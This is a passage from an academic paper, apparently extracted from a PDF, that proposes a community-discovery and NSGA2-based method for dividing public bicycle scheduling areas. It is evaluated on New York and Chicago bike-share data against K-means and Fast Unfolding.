(Miranda-Bront et al., 2017) decomposes the problem of public bicycles into two sub-problems: scheduling area partitioning and scheduling path planning. Then create an integer programming model to achieve as few bicycle rental points as possible. In addition, other researchers chose to use clustering algorithms. Phanikrishnakishore & Madamsetti (2014) used the rental rules between public bicycle stations, the space of public bicycle stations, and the non-spatial attributes of public bicycle stations, as well as the self-flow characteristics, using association rules to classify sites with strong correlation into the same category. Finally, various types of site space enclosed areas serve as the scheduling area for public bicycles. Zhang, Liang & Wei (2017) proposed a public bicycle scheduling area division scheme based on the improved K-means clustering algorithm. In the data analysis, the algorithm effectively estimates the k central sites at the initial central site. After the K-means clustering algorithm is divided, the edge sites are clustered and Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 2/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 adjusted again according to the scheduling requirements. Xu, Qin & Ma (2017) integrates the spatial relationship between the sites, and the lease relationship of the bicycle, establishes the similarity matrix of the site, and proposes the parameters of the regional coupling, quantifies the degree of connection between the regions, and finally uses the clustering algorithm to obtain the corresponding result. Long, Szeto & Huang (2014) established a dynamic regional scheduling model, for large-scale public bicycle scheduling problems, and proposed a multi-stage re-optimized dynamic clustering algorithm, integrates optimal division, task balance between regions and regions. Within the balance of demand, three factors are progressively clustered, and in the process of solving, the abnormal sites are continuously split to gradually improve the clustering results. Dziauddin, Powe & Alvanides (2015) has studied the public bicycle dispatching area, found that there are often abnormal sites in the division, and he proposed a K-Center algorithm, adaptively limits the capacity of the rental site. Hartmann Tolić, Martinović & Crnjac Milić (2018) analyzed the spatial attributes and community structure of public bicycles, and the paper used the community discovery algorithm to analyze the community structure of public bicycles in Washington, London and Boston, and verified the existence of community structure in the public bicycle network. The main method of scheduling area division is model method (Dubey & Borkar, 2015) and clustering algorithm (Sun, Zhang & Du, 2015). The model method requires abstract research, and there are many constraints and it is not easy to solve. Clustering algorithm is very difficult to determine the number of clusters, and it is difficult to evaluate. Moreover, the scheduling workload has no evaluation criteria, and it does not consider whether the workload is balanced. Therefore, this paper proposes a new method to solve the problem. SCHEDULING AREA DIVISION MODEL DESIGN This part establishes the division model of public bicycle scheduling area, including the description of the model, and the assumptions of some conditions, and some interpretations of the parameters. Finally, this chapter will propose a lease/return point demand forecasting model, the data obtained from this model can help this paper verify whether CDoMO’s estimated total dispatch distance is the shortest. Problem description At present, the clustering algorithm is mainly used to solve the problem of scheduling area division. The data set abbreviated to DS is preprocessed using a data preprocessing program. Turn a data set into a lease/return relationship abbreviated to LRR between sites. Then, through the similarity calculation between the sites, the similarity matrix abbreviated to SM is generated (Yanping, Decai & Duoning, 2017). Conversion from DS to SM, as shown in Eq. (3.1), where Rij represents the similarity between site i and site j, Qij represents the number of bicycles rented from the site i and returned to the site j, Qji represents the number of bicycles rented from the site j and returned to the site i. Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 3/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 DS c1 →LRR=   Q11 Q12 Q21 Q22 ··· Q1j ... Q2j ... ... Qi1 Qi2 ... ... ··· Qij     Q11 Q12 Q12 Q22 ··· Q1i ... Q2i ... ... Qj1 Qj2 ... ... ··· Qji   c2 →SM =   R11 R12 R21 R22 ··· R1j ... R2j ... ... Ri1 Ri2 ... ... ··· Rij   (3.1) The conversion process represented by c1 and c2 is as follows: Eqs. (3.2), (3.3), M represents the time range, which is based on the number of days: c1 :progressing program (3.2) c2 :Rij = Qij+Qji M (3.3) SM =   R11 R12 R21 R22 ··· R1j ... R2j ... ... Ri1 Ri2 ... ... ··· Rij   CA→DR={R1,R2,...,Rn} (3.4) Finally, the clustering algorithm abbreviated to CA is used for dividing, Rn stands for dividing into n independent scheduling areas is shown in Eq. (3.4). If the division result abbreviated to DR conforms to the lease/return law abbreviated to LRL, the user can actively complete a part of the scheduling work to reduce the scheduling workload. However, in the actual scheduling area division, in order to obtain the highest comprehensive benefits, the regional division should not only conform to the law, but also achieve the balance of scheduling workload as much as possible (Shpak et al., 2017). The regional scheduling workload is mainly determined by the distance within the area and the number of stations in the area. Z1 and Z2 should be as small as possible if the regional workload is balanced. This balance problem can be transformed into a multi-objective optimization problem. The objective function f is shown in Eq. (3.5): DR={R1,R2,...,Rn} MOO → minf =[Z1,Z2] T (3.5) Z1 : Variance of the dispatch distance Z2 : variance of the number of sites MOO: Multi-objective optimization Calculation of Z1 in the following Eq. (3.6), n represents the number of areas, Di represents the estimated dispatch distance of area i, and D represents the average of the estimated dispatch distances: Z1= 1 n−1 n∑ i=1 ( Di−D )2 (3.6) Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 4/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 Calculation of Z2 in the following Eq. (3.7), n represents the number of areas, Ni represents the number of internal sites in area i, and N represents the average number of internal sites: Z2= 1 n−1 n∑ i=1 ( Ni−N )2 (3.7) s.t. S= [ (Si−P)∪(Sj−P) ] ∪P (3.8) Equation (3.8) indicates that each site must be divided into an area. Si and Sj represent the partition set. P represents the parking lot sites collection:[ [Si−P]∩[Sj−P] ] =∅(i 6= j) (3.9) Equation (3.9) indicates that a site can only be divided into an area: Si∩P 6=∅,Sj∩P 6=∅ (3.10) Equation (3.10) indicates that each scheduling area contains at least one dispatch center. There are two optimization goals for this issue: • Minimize the variance between the estimated dispatch distance between each area; • Minimize the variance between the numbers of sites in each area. Model assumptions and parameter description The scheduling area dividing process is complicated, and the abstract model involves many parameters. In order to make the model as close as possible to the actual division, before the model is established, some assumptions about the scheduling area dividing process are assumed: • The scheduling distance of each area can be estimated theoretically, the estimated scheduling distance is approximately equal to the actual scheduling distance; • Dispatching vehicles are not limited by driving time and mileage; • Only one dispatching vehicle in each area is responsible for bicycle dispatch; • Model of the dispatching vehicle is consistent with all parameters; • The dispatching vehicle departs from the dispatching center, completes the dispatching task, and then returns to the original dispatching center, regardless of vehicle failure, and other unexpected factors. Based on the problem description and model assumptions, the parameters and variables of the model in Table 1 are defined. Leasing demand forecasting model After the scheduling area is divided, in order to calculate the estimated total distance of the scheduling, it is necessary to ensure that the demand for the lease/return site is known, so it is necessary to predict the scheduling demand for the lease/return site in the future. This section will be divided into 24-time periods in hours per day named t, t ∈{0,1,...,23}. A Meteorology Similarity Weighted K-Nearest-Neighbour (MSWK) method is introduced to predict the number of least and returned bicycle at the site. Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 5/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 Table 1 Parameters and variables of the model. Based on the problem description and model assump- tions, the parameters and variables of the model are defined. Parameters/variables Parameter/variable meaning n The number of areas i,j Area number Di The estimated scheduling distance of the area i Dj The estimated scheduling distance of the area j D Regional estimated dispatch distance average Ni The number of sites in area i Nj The number of sites in area j N Average number of sites within the area S Collection of sites Si Site division set for area i Sj Site division set for area j P parking lot site collection Table 2 Exact values. In the measurement of the similarity of weather, the weather is split into five levels and assigned corresponding values. The exact values are shown in the table. Weather Value Heavy snow, heavy rain 1 Snow, light snow, moderate rain, light rain 0.75 Foggy 0.5 Sunny and cloudy 0.25 Leasing number forecast model MSWK is an improved method for predicting lease/return bicycle quantity based on KNN algorithm. Analysed the amount of leasing in a similar time period to predict future leasing. Weather, temperature, humidity, winds speed, and visibility are measured in five indicators. In the measurement of the similarity of weather, the weather is split into five levels and assigned corresponding values. The exact values are shown in Table 2. The quantified weather conditions at p and q for two days t is denoted by WDtp and WDtq, respectively, and the weather similarities for t in p and q are defined as follows (Eq. (3.11)): λ1= 1 2πσ1 e − ( W Dtp −W Dtq )2 σ21 (3.11) The temperatures of the p and q two days t periods are denoted by FDtp and FDtq. The temperature similarities of the t time periods in p and q are defined as follows (Eq. (3.12)): λ2= 1 2πσ2 e − ( F Dtp −F Dtq )2 σ22 (3.12) Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 6/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 The three dimensions of humidity, wind speed, and visibility are represented by a 3-D Gaussian kernel function, and HDtp,SDtp,VDtp represents the humidity, wind speed, and visibility of the t time period in p, respectively. The humidity, wind speed, and visibility similarity of p and q periods in t are defined as follows (Eq. (3.13)): λ3= 1 2πσ e −   ( H Dtp −H Dtq )2 σ23 + ( S Dtp −S Dtq )2 σ24 + ( V Dtp −V Dtq )2 σ25   (3.13) In order to simplify the calculation, the temperature, humidity, wind speed, and visibility are normalized and all σ1,σ2,σ3,σ4,σ5 are set to 1, thereby simplifying the calculation; finally, by weighting the above three similarity indexes, p and q can be obtained. The overall similarity indicator at time t as follows (Eq. (3.14)): M ( Dtp,D t q;a ) =δw ( Dtp,D t q ) 3∑ i=1 aiλi (3.14) Where δw ( Dtp,D t q ) is a judgment function, when both p and q are working days or all non-working days, δw ( Dtp,D t q ) =1, otherwise δw ( Dtp,D t q ) =0. If you want to predict the amount of rent in the t time period in q, select the most similar K days and use the MSWK algorithm to calculate the predicted value. The specific Eq. (3.15) is as follows: si ·pd ( Dtq;a ) = ∑K p=1M ( Dtp,D t q;a ) si ·pd ( Dtp ) ∑K p=1M ( Dtp,D t q;a ) (3.15) Returning number forecast model After a user rents a bicycle, they often return the bicycle to an adjacent site within a certain period of time. Therefore, there is a need for prediction data of the number of bicycles based on neighbouring sites, which is used to predict the number of bicycles returned to the site. Bicycles rented from site i during time t may be returned to site j adjacent to i during time t or t+1. For the forecast of the number of return bicycles within the lease time t period, it is necessary to first estimate the number of bicycles rented from the site i and at the site j within the time period t. The specific Eq. (3.16) is as follows: etij = si ·pd(t) eij ·f si ·pd (3.16) Among them, si·pd(t) is the predicted value of bicycle rental quantity from site i in time period t, eij ·f is historical record of bicycle rental from site i and is still at site j. si ·pd is historical total bicycle rental record from site i. Through the analysis of historical data, it is found that the user’s riding time law can be fitted by the 2-Gaussian function. Therefore, the riding time Dij(t)between rental sites i and j can be estimated by Eq. (3.17): Dij(t)=g1(t;µ1,σ1)+g2(t;µ2,σ2). (3.17) Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 7/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 Assume that the user’s return time is evenly distributed, and the user’s behaviour of returning the leased bicycle is completed within the t time period or t+1-time period. During the time periods t and t+1, the user t1 rents a bicycle from the site i at the moment, and the probability of returning the ticket at the site j at t2 is as follows (Eqs. (3.18) and (3.19)): Ptij = 1 |t| ∫ |t| 0 ∫ |t|−t ′ 1 0 dt ′ 1dt2Dij(t2) (3.18) Pt+1ij = 1 |t| ∫ |t| 0 ∫ +∞ |t|−t ′ 1 dt ′ 1dt2Dij(t2). (3.19) Finally, considering the traffic patterns and the corresponding probabilities of the adjacent sites, the formula for predicting the number of return bicycles within the sites is obtained as follows: si ·dd(t)= ∑ j 6=i etijP t ij+e t−1 ij P t+1 ij . (3.20) So far, the demand 1N of the site i at the time t in the future will be calculated by combining the demand for rental and return of the rental site i at the time t in the future. The specific formula is as follows: 1N = si ·dd(t)−si ·pd(t). (3.21) If 1N is less than zero, it means that the site i will not be able to meet the user’s bicycle rental demand at the time t in the future, and it is necessary to dispatch the bicycle through dispatch (Feng, Zhu & Liu, 2018). If 1N is greater than the number of parking spots at the leased site, it means that the site i at the time t in the future cannot satisfy the user’s demand for returning the car. It is necessary to reduce the number of bicycles by scheduling. COMMUNITY DISCOVERY ALGORITHM BASED ON MULTI-OBJECTIVE OPTIMIZATION Community discovery algorithm based on multi-objective optimization, which combines quantitative indicators of regional scheduling workloads, community discovery algorithms (Shivach, Nautiyal & Ram, 2018), and multi-objective optimization algorithms (Mori & Saito, 2016). Firstly, the Fast Unfolding community discovery algorithm (Sun et al., 2018) is performed based on the similarity matrix of the site. Secondly, the workload adjusts the results of the community discovery algorithm. Throughout the process, the results are continuously optimized through a multi-objective optimization algorithm. CDoMO scheduling workload analysis Scheduling workload is an indicator to measure the workload of a dispatch line. The scheduling itself involves many fields, so there is no uniform standard (Kim, Jeong & Lee, 2017). The generalized scheduling workload is mainly determined by the scheduling distance, the delivery volume and the number of service outlets. The three parameters Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 8/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 are weighted and integrated, and the workload of the dispatching line can be quantified. Suppose W is the generalized scheduling workload, D is the driving distance (km), N is the number of outlets (pieces), S is the delivery amount (pieces), and ρ1,ρ2,ρ3 is the driving distance weight, the delivery amount weight, and the service outlet quantity weight as follows Eq. (4.1): W =ρ1 ·D+ρ2 ·N +ρ3 ·S (4.1) This paper combines generalized scheduling workload with public bicycles, and then obtains a quantitative formula for regional scheduling workload, Wi is the scheduling workload of area i, and Di is the scheduling distance of area i, which is calculated by the maximum generation star algorithm. Ni is the number of stations in area i, Si is the number of stations in area i, and ρ1,ρ2,ρ3 is the corresponding weight coefficient as follows Eq. (4.2): Wi=ρ1 ·Di+ρ2 ·Ni+ρ3 ·Si (4.2) Since the regional scheduling is based on all stations in the entire area, and in the scheduling area division stage, the waiting scheduling sites and scheduling quantities of each area are unknown, so in this paper, the impact of Si on the scheduling workload is ignored, that is, let ρ3=0. So, the Eq. (4.3) can be simplified to: Wi=ρ1 ·Di+ρ2 ·Ni. (4.3) In the quantitative formula of scheduling workload, the weight coefficient cannot be determined manually, but when the scheduling workload balance is satisfied, the estimated scheduling distance variance in each area, and the variance of the number of stations in each area should be as small as possible, so the scheduling balance the problem can be turned into a multi-objective optimization problem. The objective function is min f =[Z1,Z2]T . NSGA2 is the most popular multi-objective genetic algorithm. NSGA2 first genetically manipulates the population P to obtain the population Q; then the populations are combined and then combined with non-inferior sorting and crowding distance sorting, and then a new population is established. Repeat the above process, until the termination condition is met. The detailed process is as follows: (1) Randomly generate the initial population P0, then sort the populations non-inferiorly, and assign a non-dominant value to each individual; then perform the operations of selection, crossover, and mutation on the initial population P0 to obtain a new population Q0, set to i=0. (2) Combine the populations of the father and offspring, then form a new population Ri=Pi∪Qi, and then sort the population Ri non-inferiorly to obtain the non-inferior layer F1, F2, ···. (3) Perform replication, crossover, and mutation operators on population Pi+1 to form population Qi+1. (4) If the termination condition holds, then it ends; otherwise, i = i+1, go to step (2). The main process diagram of NSGA2 is shown in Fig. 1: This paper uses the NSGA2 multi-objective optimization algorithm to resolve the scheduling area partition model (Wu, 2014). The length of the chromosome in NSGA2 Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 9/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 Figure 1 The main process of NSGA2 algorithm. Full-size DOI: 10.7717/peerjcs.224/fig-1 is 2 (Basch et al., 2015), which corresponds to the value of the weight parameter in the area scheduling workload. Each individual corresponds to a scheduling workload formula, based on schedule the workload adjustment community found the results of the division. Figure 2 shows the restricted flow of NSGA2 algorithm. CDoMO algorithm design Community discovery algorithm built on multi-objective integrates quantitative indicators of regional scheduling workloads, community discovery algorithms and multi-objective optimization algorithms. Firstly, the Fast Unfolding community discovery algorithm is implemented based on the similarity matrix of the least sites; secondly, the workload index is used to adjust the results of the community discovery algorithm. The entire process continuously optimizes the results from a multi-objective optimization algorithm. Table 3 displays the detailed algorithm calculation. EXPERIMENT AND ANALYSIS The rest of the paper is part of the experiment and analysis. The experimental section was divided into two groups, which were experiments using New York public bicycle data and Chicago public bicycle data. In the analysis section, the two groups of experiments use K-means clustering algorithm, and Fast Unfolding community discovery algorithm as comparisons, it compares the three aspects of the number of rental sites, the variance of the number of scheduled bicycles, and the estimated total distance of scheduling. The comparative data show that the algorithm is effective against both sets of experiments. Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 10/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-1 http://dx.doi.org/10.7717/peerj-cs.224 Figure 2 Specific flow of NSGA2 algorithm. Full-size DOI: 10.7717/peerjcs.224/fig-2 New York public bicycle Data set introduction Citi Bikes (Jiang et al., 2018) is a people-benefit project launched by the New York City Government. Figure 3 displays the spatial distribution of rental sites. Blue represents Manhattan, with 250 rental sites; green represents Brooklyn, with 77 sites. Each Citi Bicycle rental site has GPS location information, so it is not difficult to locate the rental site. The system records the user’s data onto each cycle. The package contains the location and time data onto the start and the end of the site, the entire riding process, the bicycle ID, and the user’s gender and birth date. This experiment will use the May 2016 rent-return dataset of New York public bicycles to conduct an experiment, a total of 96, and 1986 rent-return data. The dataset contains 16 fields, and the nine fields related to this experiment are shown in Table 4. This paper uses the pre-processing program to process the leased data, it turned into the lease-return relationship between the least sites (Guo et al., 2017). It also generates a similarity matrix based on the rent-return relationship. The similarity calculation formula Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 11/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-2 http://dx.doi.org/10.7717/peerj-cs.224 Table 3 Detailed algorithm calculation. Algorithm: Community discovery algorithm based on multi-objective optimization Input: Site similarity matrix X, population number popsize, maximum number of iterations MaxGen. Output: Optimal regional division results ρ∗1, and workload index parameters ρ ∗ 2 . 1. Initialize the historical optimal solution f ∗ and its workload index parameter ρ∗1,ρ ∗ 2 . 2. Perform a pass phrase of the Fast Unfolding community discovery algorithm, and obtain the results of the preliminary zoning division as R. 3. Calculate the estimated distance Di of each area in R, number of regional sites Ni. 4. Individual genes in the population as weight coefficients ρ1,ρ2. Finally, the scheduling workload of each area is calculated by the formula Wi =ρ1 ·Di+ρ2 ·Ni. The variance of the regional workload is denoted as V. 5. For each rental site i, try to put i into other communities and calculate the incremental 1V of the adjustment workload, the entire process records the maximum 1Vmax and the corresponding community k. If 1Vmax < 0, site node i does not adjust; if 1Vmax >0, node i is adjusted to community k. Traverse all the site until all the site are adjusted and the result is recorded as R∗. 6. Define the variance function f1 of the regional site, and define the regional dispatch distance variance function f2, they are two objective functions to perform fast non-dominated sorting on the results, the records of the optimal solution in the contemporary population as f ′ , and its corresponding scheduling workload parameters are denoted as ρ ′ 1,ρ ′ 2. If f ′ > f ∗ after comparison, letting ρ∗1 =ρ ′ 1,ρ ∗ 2 =ρ ′ 2. 7. Determine whether the number of program iterations exceeds the maximum number of iterations MaxGen. If it exceeds, the optimal regional division results, and workload in- dex parameters ρ∗1,ρ ∗ 2 are output; otherwise, a new population is generated through elite strategy selection, which can ensure that certain elite individuals will not be discarded during the evolution process, thereby improving the accuracy of the optimization re- sults, and expanding the sampling space. And gene crossover and mutation processes and the execution continue from 1. for the least sites is as follows (Eq. (4.4)): Rij = Qij+Qji M (4.4) Among them, Rij represents the similarity between site i and site j; Qij represents the number of times to rent a bicycle from site i and site j to return the bicycle; Qji represents the number of times of renting a bicycle from site i and returning it at site j; M represents the time range in days. In this experiment, the data set was a total of 31 days in May 2016, so M =31.The corresponding abstract network can be generated through the lease-return relationship (Fig. 4). Due to the dense population, dense sites, and prosperous business, the sites in Manhattan are more closely linked, and Brooklyn is a river is separated from Manhattan, so the connection between the two regional sites is sparse except for the leases along the river. Experimental result In the experiment, we first used the Gephi visualization network analysis platform to analyse the community structure in the data (Hu, An & Wang, 2018). The Gephi platform uses the integrated Fast Unfolding algorithm, it divides the public bicycle abstraction network according to the rules of public bicycle rental. The Fast Unfolding algorithm mainly Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 12/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 Figure 3 Spatial distribution map of public bicycles in New York. Full-size DOI: 10.7717/peerjcs.224/fig-3 includes two phases. The first phase is known as Modularity Optimization. The main part is to divide each node into the community, its neighbourhood nodes are located, so that the value of the module degree becomes larger; the second phase is called community. Aggregation is mainly to aggregate the communities divided in the first step into one site, that is, to rebuild the network based on the community structure generated in the previous step. Repeat the above process, until the structure of the network no longer changes (Fig. 5). After the Fast Unfolding algorithm for the New York public bicycle rental site in this paper, Fig. 6 shows the internal community structure of the abstract network of New York’s public bicycles, where the dots represent sites, where the sites of different communities are represented by different colours, and the lines represent the relationships between the sites; obviously, six communities have more close contact with leases within the same community, and the links between different societies are relatively sparse. The results of the Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 13/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-3 http://dx.doi.org/10.7717/peerj-cs.224 Table 4 Dataset contains 16 fields, and the nine fields. No. Fields Meaning 1 start time Starting time 2 stop time End Time 3 start_station_id Bicycle rental site ID 4 start_station_name Name of bicycle rental site 4 start_station_longitude Longitude of rental bicycle rental site 5 start_station_latitude Latitude of rental bicycle rental 6 end_station_id Return bicycle rental ID 7 end_station_name The name of the bicycle rental site 8 end_station_longitude The longitude of the bicycle rental site 9 end_station_latitude The longitude of the bicycle rental site Fast Unfolding community discovery algorithm are mapped to map on New York (Fig. 7). Manhattan is a densely populated administrative district, and the vast majority of public bicycles in the area ride on the inside, so the Manhattan District is divided into five areas according to the law of rent. Brooklyn is structured in a district. Although the division results are relatively reasonable, there are still many abnormal sites. These abnormal sites are far away from their respective areas; the number of sites of each area is uniform. CDoMO is based on community discovery algorithm, considering the regional scheduling workload factors. The regional scheduling workload is determined by estimated dispatch distance and the number of regional least sites. If the community finds out that there are abnormal sites, it will cause regional forecasting scheduling distance become larger, so that the variance between the scheduling distances will become larger. If there is a major difference in the number of sites between areas, the variance between the numbers of sites will increase. The goal of CDoMO is to optimize the variance of the distance between the regional scheduling, and optimize the variance of the number of sites. In the optimization process, the division results can be adjusted to make it more reasonable. The division process does not take into consideration the deficiencies in the workload balance in each scheduling area. After the community discovery algorithm based on multi-objective optimization solves the division model of the public bicycle scheduling area, the experimental results shown in Fig. 8 are obtained. By comparing the result shows that the sites along the Williamsburg Bridge and the riverside along Manhattan is divided into the same dispatch area, which is more n line with the rules of public bicycle rental and resolving the anomaly (Zhang et al., 2011). The difference between the number of sites and regional sites is too large (Manju & Fred, 2018). In order to maintain the consistency of the experiment, the value of k in the classical clustering algorithm K-means algorithm is set to 6 (Lin & Song, 2017), and then the clustering is based on the same data set; the space area enclosed by the sites in each class as the scheduling area. In order to achieve regional division, the results of the regional division based on the clustering algorithm (Fig. 9). It was found that when the clustering number is k=6, the clustering algorithm achieves a poor regional division. The number of sites in the class represented by the red is very large, while the number of classes represented by purple Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 14/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.224 Figure 4 Abstract network of public bicycles in New York City. Full-size DOI: 10.7717/peerjcs.224/fig-4 and beige is very small, and the number of sites to vary greatly from the types. In addition, the boundaries of each scheduling area are unclear and are overlapped (Zhen et al., 2016). Algorithm performance comparison results Built on the overall experimental results of the above three methods, it is found that the multi-objective optimization-based community discovery algorithm proposed to this Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 15/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-4 http://dx.doi.org/10.7717/peerj-cs.224 Figure 5 Schematic diagram of community discovery algorithm. Full-size DOI: 10.7717/peerjcs.224/fig-5 Figure 6 Schematic diagram of analysis results of the Gephi Visual Network Analysis platform. Full-size DOI: 10.7717/peerjcs.224/fig-6 paper can make the division of the areas consistent with the rules and make the regional scheduling workload as balanced as possible. In addition to the analysis of the overall distribution of provincial division space, the paper also compares and analyses the three Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 16/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-5 https://doi.org/10.7717/peerjcs.224/fig-6 http://dx.doi.org/10.7717/peerj-cs.224 Figure 7 Results of fast unfolding community Discovery algorithm in the New York dataset. Full-size DOI: 10.7717/peerjcs.224/fig-7 dimensions of the regional rental site variance, the regional dispatch distance variance, and the estimated total dispatch distance. Figure 10 compares the variance between the numbers of sites. The data show that the variance between the CDoMO compared to the K-means algorithm is reduced by 63.31%, and the variance of the Fast Unfolding algorithm is reduced by 32.32%. Figure 11 compares the variance of the number of bicycles dispatched in the area. The data show that the variance of the CDoMO algorithm compared to the K-means algorithm is reduced by 88.06%, and the variance of the Fast Unfolding algorithm Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 17/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-7 http://dx.doi.org/10.7717/peerj-cs.224 Figure 8 Results of region partition based on multi-objective optimization algorithm in the New York dataset. Full-size DOI: 10.7717/peerjcs.224/fig-8 Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 18/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-8 http://dx.doi.org/10.7717/peerj-cs.224 Figure 9 Results of region partition based on clustering algorithm in the New York dataset. Full-size DOI: 10.7717/peerjcs.224/fig-9 is reduced by 38.14%. Figure 12 compares the estimated total scheduled distances. The data show that the variance of the CDoMO algorithm is 55.17% compared with the K-means algorithm and 27.54% compared to the Fast Unfolding algorithm. When scheduling and partitioning based on multi-objective optimization algorithm, the estimated scheduling distance can be shortened, and the estimated scheduling distance is positively related to the actual scheduling distance, so the actual scheduling distance will also be shortened; in addition, the scheduling work of each area will also be made. Relatively balanced. Figure 13 is a comparative display of experimental results. Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 19/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-9 http://dx.doi.org/10.7717/peerj-cs.224 Figure 10 Difference in the number of bicycle rental points under three algorithms in the New York dataset. Full-size DOI: 10.7717/peerjcs.224/fig-10 Figure 11 Distance difference of bicycle scheduling area under three algorithms in the New York dataset. Full-size DOI: 10.7717/peerjcs.224/fig-11 Chicago public bicycle Data set introduction First of all, the data set cited in this paper is from Chicago public bicycle data (Ye, Chu & Xu, 2015). The starting site is 2015-1-1, and the deadline is 2015-6-30. There are two quarters and six months of data, a total of 759,789 data records. This paper did some data pre-processing: Trips that did not include a start or end date were removed from the original table. Then, in order to ensure that the information of the data set more abundant, this paper decided to use the data set, distance information of each pair of source address and destination address. Finally, we utilize certain data pre-processing methods to remove weather and other data because it can be considered as an ideal condition. The dataset Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 20/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-10 https://doi.org/10.7717/peerjcs.224/fig-11 http://dx.doi.org/10.7717/peerj-cs.224 Figure 12 Total distance of estimated scheduling under three algorithms in the New York dataset. Full-size DOI: 10.7717/peerjcs.224/fig-12 Figure 13 Comparison of experimental results of region partition under three algorithms in New York dataset. Full-size DOI: 10.7717/peerjcs.224/fig-13 contains 12 fields, and the 10 fields related to this experiment are presented in the following Table 5. Experimental result Results of the Fast Unfolding community discovery algorithm can be mapped to Chicago map as the picture shows (Ye, Chu & Xu, 2015). In contrast, the division results are more uniform and reasonable, but there are too many abnormal sites in the middle. These abnormal sites are a long way from where they should have existed. The number of rental sites in a divided area is not particularly uniform (Fig. 14). Based on CDoMO, in the optimization process, the division results are dynamically adjusted in time. Therefore, in this case, the division result is more reasonable, and the problem of scheduling balance, this algorithm obviously adds more consideration. It not only addresses the problem of abnormal sites, but also solves the problem of differences in the number of regional sites at the same time (Fig. 15). In order to make the experiment Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 21/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-12 https://doi.org/10.7717/peerjcs.224/fig-13 http://dx.doi.org/10.7717/peerj-cs.224 Table 5 Dataset contains 12 fields, and the 10 fields. No. Fields Meaning 1 start time day and time trip started, in CST 2 stop time day and time trip ended, in CST 3 from_station_id ID of station where trip originated 4 from_station_name name of station where trip originated 5 from_station_longitude Longitude of rental bicycle rental site 6 from_station_latitude Latitude of rental bicycle rental 7 to_station_id ID of station where trip terminated 8 to_station_name name of station where trip terminated 9 to_station_longitude The longitude of the bicycle rental site 10 to_station_latitude The longitude of the bicycle rental site Figure 14 Results of fast unfolding community discovery algorithm in Chicago dataset. Full-size DOI: 10.7717/peerjcs.224/fig-14 Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 22/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-14 http://dx.doi.org/10.7717/peerj-cs.224 Figure 15 Results of region partition based on multi-objective optimization algorithm in the Chicago dataset. Full-size DOI: 10.7717/peerjcs.224/fig-15 consistent, we set the value of k in the K-means algorithm as 5, and then we clustered the uniform data set. The results of the clustering are presented in the figure. This paper believes that the results obtained by the clustering algorithm are very poor, because the red sites represent a particularly large number of sites. The yellow site represents a particularly small number of rental sites. This shows that the various types of leases, the number of differences is too large, in addition, this algorithm also led to the border is not clear, and there is some inevitable overlap. In the actual scheduling work, this situation is not allowed, as showed in Fig. 16. Algorithm performance comparison results This paper will describe the quantified experimental results of the three methods, it compares the differences between them. It is easy to see that the algorithm proposed in Lin et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.224 23/30 https://peerj.com https://doi.org/10.7717/peerjcs.224/fig-15 http://dx.doi.org/10.7717/peerj-cs.224 Figure 16 Results of region partition based on clustering algorithm in the Chicago dataset. Full-size DOI: 10.7717/peerjcs.224/fig-16 this paper is optimal, compared to the other two algorithms. Figure 17 compares the difference between the numbers of sites. Compared to the K-means clustering algorithm and the Fast Unfolding community discovery algorithm, the variance of the CDoMO algorithm is reduced by 66.98% and 22.57%. Figure 18 in this paper compares the number of scheduled bicycles, it finds that the CDoMO algorithm set out in the present paper is an optimal algorithm. Similarly, opposed to the K-means clustering algorithm and the Fast Unfolding community finding algorithm, the variance is reduced by 83.77% and 48.72% (Fig. 19). Figure 20 compares the estimated total distance of scheduling with the other two algorithms, and the conclusion shows that the distance is decreased by 50.82% and 22.08%. Then we can conclude that the CDoMO algorithm proposed in this paper: It effectively reduces the number of sites; it effectively reduced the variance in the number of bicycles dispatched; it effectively reduced the estimated total distance for scheduling. Lin et al. (2019), 